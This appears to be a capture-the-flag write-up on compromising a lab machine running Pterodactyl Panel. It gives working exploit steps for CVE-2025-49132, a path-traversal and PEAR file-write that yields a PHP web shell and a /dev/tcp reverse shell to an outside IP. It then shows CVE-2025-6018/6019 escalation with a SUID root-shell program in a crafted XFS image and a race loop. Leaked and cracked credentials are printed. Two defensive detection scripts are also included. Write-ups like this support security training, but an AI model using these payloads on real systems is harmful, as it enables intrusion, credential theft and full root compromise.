This article walks through the security assessment of a system named "Pterodactyl": information gathering, vulnerability analysis and exploitation. Using tools such as Nmap and Dirsearch, the Pterodactyl panel version and a potential unauthenticated remote code execution (RCE) vulnerability are identified. The article then describes in detail how vulnerabilities such as CVE-2025-49132 and CVE-2025-6018 are exploited for privilege escalation, ending with the user flag and root privileges. The emphasis is on the technical details and attack vectors involved in security testing on a Linux host.

Information Gathering

# Nmap 7.98 scan initiated Mon Feb  9 18:09:25 2026 as: /usr/lib/nmap/nmap -p 22,80 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.219.125
Nmap scan report for 10.129.219.125
Host is up (0.074s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6 (protocol 2.0)
| ssh-hostkey:
|   256 a3:74:1e:a3:ad:02:14:01:00:e6:ab:b4:18:84:16:e0 (ECDSA)
|_  256 65:c8:33:17:7a:d6:52:3d:63:c3:e4:a9:60:64:2d:cc (ED25519)
80/tcp open  http    nginx 1.21.5
|_http-title: Did not follow redirect to http://pterodactyl.htb/
|_http-server-header: nginx/1.21.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  9 18:09:35 2026 -- 1 IP address (1 host up) scanned in 9.91 seconds

Dirsearch

dirsearch -u http://pterodactyl.htb/ -e txt,html,php

/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: txt, html, php | HTTP method: GET | Threads: 25 | Wordlist size: 10403

Output File: /home/kali/Work/HTB/Pterodactyl/reports/http_pterodactyl.htb/__26-02-11_15-51-37.txt

Target: http://pterodactyl.htb/

[15:51:37] Starting:
[15:51:54] 403 -  555B  - /.ht_wsr.txt
[15:51:54] 403 -  555B  - /.htaccess.bak1
[15:51:54] 403 -  555B  - /.htaccess.orig
[15:51:54] 403 -  555B  - /.htaccess_sc
[15:51:54] 403 -  555B  - /.htaccess_orig
[15:51:54] 403 -  555B  - /.htaccess.save
[15:51:54] 403 -  555B  - /.htaccess_extra
[15:51:54] 403 -  555B  - /.htaccess.sample
[15:51:54] 403 -  555B  - /.htaccessOLD
[15:51:54] 403 -  555B  - /.htaccessBAK
[15:51:54] 403 -  555B  - /.htaccessOLD2
[15:51:54] 403 -  555B  - /.htm
[15:51:54] 403 -  555B  - /.html
[15:51:54] 403 -  555B  - /.htpasswd_test
[15:51:54] 403 -  555B  - /.htpasswds
[15:51:54] 403 -  555B  - /.httr-oauth
[######              ] 30%   3214/10403        62/s       [15:53:01] 200 -  920B  - /changelog.txt
[15:54:05] 200 -   72KB - /phpinfo.php
[15:54:14] 403 -  555B  - /Public/

The version found is Pterodactyl Panel v1.11.10.

This version has an RCE vulnerability: arbitrary code execution through the /locales/locale.json endpoint using the locale and namespace query parameters, with no authentication required.

FFUF virtual host fuzzing

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://pterodactyl.htb -H "Host: FUZZ.pterodactyl.htb" -fs 145


        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pterodactyl.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Header           : Host: FUZZ.pterodactyl.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 145
________________________________________________
panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 545ms]

Adding this virtual host, panel.pterodactyl.htb, brings up the login page of the pterodactyl.htb control panel.

Vulnerability Analysis

CVE-2025-49132

Core principle

  1. Entry point: the /locales/locale.json endpoint does not filter its parameters.
  2. Path traversal: the locale parameter uses ../ to break out of the language directory.
  3. File targeting: the namespace parameter selects the target file name (the backend appends .php automatically).
  4. Leak mechanism: the backend executes the PHP file (for example config/database.php), mistakes the array it returns for a language pack, and outputs it as JSON.

Exploitation:

GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database

This yields the database credentials pterodactyl:PteraPanel; trying them against SSH and the panel login does not work.

RCE

Seen in phpinfo:

  • register_argc_argv => On
  • include_path => .:/usr/share/php8:/usr/share/php/PEAR

So we can test: http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+...

The response returns: config-create: must have 2 parameters, root path and filename to save as

This shows that the first parameter is the content and the second is where it is saved.

Construct the payload:

http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+<?=system('id')?>+/tmp/shell.php

If this is used directly in the browser the special characters get URL-encoded, so use curl instead.

curl -s -g -k "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/&/<?=system('id')?>+/tmp/shell.php"

Then visit http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/<?=system(hex2bin('6964'))?>+/tmp/shell.php

The output of id can be seen in the response (screenshot omitted).

Getting a reverse shell:

echo -n "bash -c 'bash -i >& /dev/tcp/10.10.16.18/443 0>&1'"|xxd -p|tr -d '\n'
# result:62617368202d63202762617368202d69203e26202f6465762f7463702f31302e31302e31362e31382f34343320303e263127

Write the file

curl -s -g -k "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/&/<?=system(hex2bin('62617368202d63202762617368202d69203e26202f6465762f7463702f31302e31302e31362e31382f34343320303e263127'))?>+/tmp/shell.php

Trigger the reverse shell

curl -s -g -k "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../tmp&namespace=shell"

This gives an initial foothold (a shell as www).
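A defender-side check for the request pattern above, added here as an example (it is not from the original writeup): it scans nginx-style access log lines for /locales/locale.json requests whose locale is not a language tag, whose namespace is not a bare word, or which carry the pearcmd/config-create argv injection. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed nginx access-log sample (not captured from the target).
ACCESS_LOG = """\
10.0.0.5 - - [11/Feb/2026:15:55:01 +0000] "GET /locales/locale.json?locale=en&namespace=validation HTTP/1.1" 200 1822
10.0.0.9 - - [11/Feb/2026:15:55:07 +0000] "GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database HTTP/1.1" 200 912
10.0.0.9 - - [11/Feb/2026:15:55:31 +0000] "GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/tmp/x HTTP/1.1" 200 140
10.0.0.9 - - [11/Feb/2026:15:56:02 +0000] "GET /locales/locale.json?locale=..%2F..%2F..%2Ftmp&namespace=shell HTTP/1.1" 200 0
10.0.0.7 - - [11/Feb/2026:15:56:10 +0000] "GET /api/client HTTP/1.1" 200 55
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# A legitimate locale is a language tag ("en", "pt_BR"); a legitimate
# namespace is one bare word ("validation"). Anything else is suspicious.
LOCALE_OK = re.compile(r"^[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,4})?$")
NAMESPACE_OK = re.compile(r"^[a-z0-9_]+$")


def inspect_request(target):
    """Return the reasons a request to /locales/locale.json looks like
    CVE-2025-49132 abuse (empty list for other paths or clean requests)."""
    url = urlsplit(target)
    if url.path != "/locales/locale.json":
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    locale = params.get("locale", [""])[0]
    namespace = params.get("namespace", [""])[0]
    reasons = []
    if not LOCALE_OK.match(locale):
        reasons.append("locale is not a language tag: %r" % locale)
    if not NAMESPACE_OK.match(namespace):
        reasons.append("namespace is not a bare word: %r" % namespace)
    # With register_argc_argv=On, "&+config-create+..." becomes argv for
    # pearcmd.php, the file-write primitive used in this writeup.
    if namespace == "pearcmd" or "config-create" in unquote_plus(url.query):
        reasons.append("PEAR pearcmd argv injection")
    return reasons


def scan_log(text):
    """Return a list of (client_ip, request_target, reasons) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(ACCESS_LOG):
        print(ip, target, "->", "; ".join(reasons))
```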

Exploitation (User Flag)

We can read /home/phileasfogg3 and obtain user.txt.

Privilege Escalation (Root Flag)

Let's look at the database

mariadb -u pterodactyl -p -h 127.0.0.1
# enter the password: PteraPanel

We obtain the hashes of two users; cracking them gives the credentials:

phileasfogg3:!QAZ2wsx

CVE-2025-6018: PAM identity spoofing vulnerability

This is the vulnerability involving ~/.pam_environment.

  • Core principle: it lies in the PAM (Pluggable Authentication Modules) configuration. On openSUSE and SUSE Linux Enterprise 15, the pam_env.so module is enabled with user_readenv=1 by default.
  • Attack vector: after logging in over SSH, the attacker creates a malicious file in their own home directory.
    • Content written: XDG_SEAT=seat0 and XDG_VTNR=1
  • Result: when the system processes the login session, Polkit (PolicyKit) is misled into believing you are sitting at the machine's physical console (the allow_active state).
  • Limitation: on its own it only grants the privileges of a "local active user", not real root, but it opens the door to high-privilege Polkit operations.

CVE-2025-6019: libblockdev logic vulnerability

This vulnerability has a wider impact, affecting almost all major distributions including Ubuntu, Debian and Fedora.

  • Core principle: it lies in libblockdev (a library for low-level block device operations) and is triggered through the udisks daemon.
  • Vulnerability details: when the system calls libblockdev to resize an XFS (Extents File System) filesystem, the program temporarily mounts that filesystem.
  • Attack vector: an "active" user registers a crafted XFS image as a udisks loop device and requests a filesystem resize, which makes libblockdev temporarily mount the attacker-controlled image (see the steps below).
  • Result: the attacker executes the SUID program inside the image at the moment it is mounted, instantly gaining root privileges.

Exploiting CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment

XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

Check that SEAT is seat0 and STATE is active

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 sessions listed.

Confirm the Polkit ticket

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit is bypassed!"

VULNERABLE: Polkit is bypassed!

If no password prompt appears and it prints VULNERABLE directly, you already hold the privilege-escalation ticket for CVE-2025-6019.
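A host-side audit for the preconditions of the two escalations above (pam_env reading ~/.pam_environment, the XDG seat/VT overrides, and an SSH session that loginctl reports as active on seat0), added here as an example and not part of the original writeup. The three inputs are constructed samples shaped like the outputs shown above, and the PAM session file (/etc/pam.d/common-session) is an assumed location.

```python
# Constructed samples shaped like the outputs in this writeup (not from a live host).
PAM_ENVIRONMENT = """\
# pam_env reads this user-writable file when user_readenv=1
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EDITOR DEFAULT=vim
"""

# Assumed content of the session stack (e.g. /etc/pam.d/common-session).
PAM_COMMON_SESSION = """\
session required pam_limits.so
session required pam_env.so readenv=1 user_readenv=1
session optional pam_umask.so
"""

LOGINCTL = """\
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no
     21 1000 alice        -     pts/1 active no
      3 1003 bob          seat0 tty2  active no

3 sessions listed.
"""

SEAT_VARS = ("XDG_SEAT", "XDG_VTNR")


def pam_env_overrides(text):
    """Seat/VT variables a .pam_environment file forces.
    pam_env line syntax: VARIABLE [DEFAULT=value] [OVERRIDE=value]."""
    found = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or parts[0] not in SEAT_VARS:
            continue
        for option in parts[1:]:
            if option.startswith(("OVERRIDE=", "DEFAULT=")):
                found[parts[0]] = option.split("=", 1)[1]
    return found


def user_readenv_enabled(text):
    """True when pam_env.so is configured to read the user's ~/.pam_environment."""
    return any("pam_env.so" in line.split() and "user_readenv=1" in line.split()
               for line in text.splitlines())


def seat_active_pts_sessions(text):
    """Sessions that hold a physical seat while attached to a pseudo-terminal:
    an SSH login should show seat '-' and must not be allow_active for Polkit."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].isdigit():
            continue  # header, footer and blank lines
        session, _uid, user, seat, tty, state = fields[:6]
        if seat != "-" and tty.startswith("pts/") and state == "active":
            hits.append((session, user, seat, tty))
    return hits


def audit(pam_env=PAM_ENVIRONMENT, pam_session=PAM_COMMON_SESSION, sessions=LOGINCTL):
    """Collect findings from the three inputs; an empty list means nothing suspicious."""
    findings = []
    if user_readenv_enabled(pam_session):
        findings.append("pam_env.so honours user-writable ~/.pam_environment (user_readenv=1)")
    for var, value in pam_env_overrides(pam_env).items():
        findings.append("~/.pam_environment forces %s=%s" % (var, value))
    for session, user, seat, tty in seat_active_pts_sessions(sessions):
        findings.append("session %s (%s) is active on %s but runs on %s" % (session, user, seat, tty))
    return findings


if __name__ == "__main__":
    for finding in audit():
        print("[!]", finding)
```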


Exploiting CVE-2025-6019

Step 1: build the malicious XFS image on the attacking machine

# 1. Create an empty 300MB image file
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. Format it as XFS (Extents File System)
mkfs.xfs xfs.image

# 3. Mount the image and plant the SUID shell wrapper
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. Write and compile a simple SUID privilege-escalation program (more reliable than copying bash)
cat << EOF > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc rootshell.c -o ./mnt/rootshell

# 5. Set the crucial SUID (Set User ID) bit
sudo chmod 4755 ./mnt/rootshell

# 6. Unmount the image
sudo umount ./mnt
rm rootshell.c

Run the above with sudo, then upload the image to the target: sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

Step 2: trigger the privilege escalation on the target

# 1. Change into /tmp
cd /tmp

# 2. Set up the loop device
# udisksctl: user-space disk control tool
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. Trigger the vulnerability: call the Resize method over D-Bus with gdbus
# This makes libblockdev (the block device manipulation library) mount the image in the vulnerable way
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# 4. Find the mount point and run the privilege-escalation program
# Once triggered, the image is mounted under a temporary /tmp/blockdev.XXXXXX directory
# (the output at the end shows /tmp/blockdev.38YCK3, so the glob is "blockdev.*", not "blockdev-*")
MOUNT_PATH=$(find /tmp -maxdepth 1 -name "blockdev.*" -type d 2>/dev/null)
if [ -z "$MOUNT_PATH" ]; then
    echo "[-] Mount failed, check whether your session is active."
else
    echo "[+] Found mount at: $MOUNT_PATH"
    $MOUNT_PATH/rootshell
fi

Step 3: start the snatching loop

# 1. Start a tight background snatcher loop
(while true; do
    target=$(find /tmp -maxdepth 1 -name "blockdev.*" -type d 2>/dev/null)
    if [ -n "$target" ]; then
        echo "[!] MOUNT DETECTED: $target"
        $target/rootshell
        break
    fi
done) &

# 2. Record the snatcher's process ID
SNATCHER_PID=$!

# 3. Set up the loop device again (using the uploaded image)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. Trigger the vulnerability (repeating it raises the success rate)
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
done

# 5. On success you land in a root shell; otherwise kill the snatcher
kill $SNATCHER_PID 2>/dev/null

Finally

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # id
uid=0(root) gid=0(root) groups=0(root),100(users)
pterodactyl:/tmp # cat /root/root.txt
